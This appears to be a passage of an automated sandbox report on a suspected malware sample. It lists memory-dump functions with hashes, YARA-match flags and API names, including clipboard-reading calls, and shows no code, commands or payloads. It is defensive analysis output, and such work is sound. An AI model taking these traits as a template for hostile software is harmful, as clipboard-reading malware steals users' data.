                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction ID: 92971dc3d07923ada9f989ed8993decc668161824d2a2e66b9805621b63cc60e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E811D673E1282047D32089198C007667656ABD9338F3E87B999789F3E2CD7B9C1386C4
                                                                                                                                                                                                                                                          Function 024A4C27 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction ID: 03b5ac495e1da3f0a6a6d0996e4385d87aedee9d03ce9a14e3ffff8e1a62161d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D711AC336051E40EC3158D3C8450669BFA30AE3539F5A839AF4BC9B2D6D7638D8B8365
                                                                                                                                                                                                                                                          Function 004349C0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction ID: 4a58b6b2eee891e707ae44f5c2f2057f1d0443dfb2677543873686b098ffc417
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11112C336441D00EC3119D3C94405A67F930AD7234F29539AF4B5973D2D5269D8A935D
                                                                                                                                                                                                                                                          Function 0249B177 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dfb3dc3b767fb5c2636dff2f08a088c85a36dc92d55bda3a4ce4858e3d47a77d
                                                                                                                                                                                                                                                          • Instruction ID: 009bc3f0a38376d57e1e4712b45677a0b2383bcefe29e3065c2e8e1f2b8a8352
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfb3dc3b767fb5c2636dff2f08a088c85a36dc92d55bda3a4ce4858e3d47a77d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E01B1F5A0030147EB22EE21A8C6B3BBAA9EF80748F18042EC8154B300DB72EC058F91
                                                                                                                                                                                                                                                          Function 0249318B Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 08cac00b27375be8d5c71b4a8acaf29695d05836bdb961565bda809aa05cdf73
                                                                                                                                                                                                                                                          • Instruction ID: 31068fb4610f62f40025ee217e1acf667a17d80766d97d2ae0819ad979c4146a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08cac00b27375be8d5c71b4a8acaf29695d05836bdb961565bda809aa05cdf73
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF11E5746583009FEB648F14C851B3BBBE1EBC7714F54596DE4D9A3290DB70A811CB06
                                                                                                                                                                                                                                                          Function 0042AF10 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4ae729b5eaa6ea3d3dd9b0738b38ff80b9ac0c8a54fdeafd4b704aef56e0587a
                                                                                                                                                                                                                                                          • Instruction ID: 689eb2972745fb3d0d71538539cd064f72764640edd73a05902de1ebbaa3ea99
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ae729b5eaa6ea3d3dd9b0738b38ff80b9ac0c8a54fdeafd4b704aef56e0587a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73019EF1B0531147D6209E11E9C0727B2A96B80708F0A057EEC0867742EB7EFC2486AB
                                                                                                                                                                                                                                                          Function 009A953B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9a9000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                          • Instruction ID: 2cc38e66a10d8456d0e5a016c5234c2cb05b33fc775e6a6c80561079f835627d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F71170727401009FDB44DE59DC82FA673EAFB8A320B298055FD08CB316E679E802C7A0
                                                                                                                                                                                                                                                          Function 0248BDC1 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
                                                                                                                                                                                                                                                          • Instruction ID: f322ed93f0110d1ef88623e9c020fc78d0b6e002ecf02832f9dff5b8d364ad4e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B1108326182C14ED708CB39C891B3EBFE24BD3208F5D957DD1D3DB696E624C5458711
                                                                                                                                                                                                                                                          Function 0041BB5A Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
                                                                                                                                                                                                                                                          • Instruction ID: acf7ba5b93058e4802585720e30b957fa2021c5bc19bb66dde8fd7dea3a34763
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f789347140fe938e4a4518c9f2bd9ce402decf9523efaaf8354aa9307fd6dce6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C211083660C2814AD708CB39C8A177BBBE24BE3204F5D857DD0D3D7AA6D628C5458755
                                                                                                                                                                                                                                                          Function 0043CA9D Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6f39adcb35a8e7c9b8f5557c3c687e47855718dd852e74ef07aa8537b368e77c
                                                                                                                                                                                                                                                          • Instruction ID: 5f93ce22784e692b25ceb2eda683e238adf69e50c1bc63fd0efb66c4fc782166
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f39adcb35a8e7c9b8f5557c3c687e47855718dd852e74ef07aa8537b368e77c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B018139A481558BDB08CB54D4916BFB771BB4A314F29716DC84273351C339ED029B98
                                                                                                                                                                                                                                                          Function 02484BCD Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 25c007a40a405cf11914d34b349d644fb1d16f787f48364c8c8a4019e3cbc612
                                                                                                                                                                                                                                                          • Instruction ID: 4099b26871e1f8fd71007da279599f56e89f1f30b111b9c57bdeccb40f88a1c4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25c007a40a405cf11914d34b349d644fb1d16f787f48364c8c8a4019e3cbc612
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF022386182029BE718AB00C591A3FB366FB86318F1A942EC58A13615C732DC42CB6A
                                                                                                                                                                                                                                                          Function 02470D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                          • Instruction ID: 8d0a441c2d4b0705bf0afeee984720ee9befd2432816eb00777e17293a30e26e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14012672A126008FDF21CF60C904BEB33F5FB86206F1554B6D92AD7381E370A841CB80
                                                                                                                                                                                                                                                          Function 0043CB51 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
                                                                                                                                                                                                                                                          • Instruction ID: d79a2076f9fe415b663fa427f0a78d1c2c40fcc50cb9dc2d5069422736f63806
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0E538E056618FDB158F24D8F0067B761FB4BB34719526CC9522B3D1C2246852CB8C
                                                                                                                                                                                                                                                          Function 0043C9DB Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                                                                                                                                                                                          • Instruction ID: 0d8eb9bbe4c4616553cbf8c480240afe708ab0011c406d2b99dd3c7f213571ee
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C01238A8C0108B8608AF00D841035B2B6A78B268B24B46AC80233206D620A802C68C
                                                                                                                                                                                                                                                          Function 024A2A17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132clipboardCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                          • String ID: T
                                                                                                                                                                                                                                                          • API String ID: 2832541153-3187964512
                                                                                                                                                                                                                                                          • Opcode ID: 970fdbe402aced0c59a89026cf40b7a5d1ce36f5375fb67720118ab2c16f9f49
                                                                                                                                                                                                                                                          • Instruction ID: 489f4e479246efb8d73d44ba5e48ad96f5c3979e550a99b42b375f2318038819
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970fdbe402aced0c59a89026cf40b7a5d1ce36f5375fb67720118ab2c16f9f49
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4941E37150C7818FC310EF7C988835EBED09B96224F044A3EE9E5863D2D6B88689D797
                                                                                                                                                                                                                                                          Function 004337D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
                                                                                                                                                                                                                                                          • Instruction ID: 0fa57810a90dcf32d4ca95e0f32b1f236f6c38084188f91b8e27ff802e92a4cc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9431B0F49142009FDB40EF68D98465ABBF4BB89304F11852EE898DB360D770A989CF86
                                                                                                                                                                                                                                                          Function 0040B3C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: Wu
                                                                                                                                                                                                                                                          • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                                          • Opcode ID: d88d72a1c936d57d04ddc120d4726eafa835f8027d19d12e8e2660557ccd8515
                                                                                                                                                                                                                                                          • Instruction ID: e3bae6e05993623113b2e393b405d3292d0619573223465a0f347bdd8208d8f0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d88d72a1c936d57d04ddc120d4726eafa835f8027d19d12e8e2660557ccd8515
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2C0027D806401FBCF026F60FD4D82A3B21FF863067118574F40140137DA620E26BA19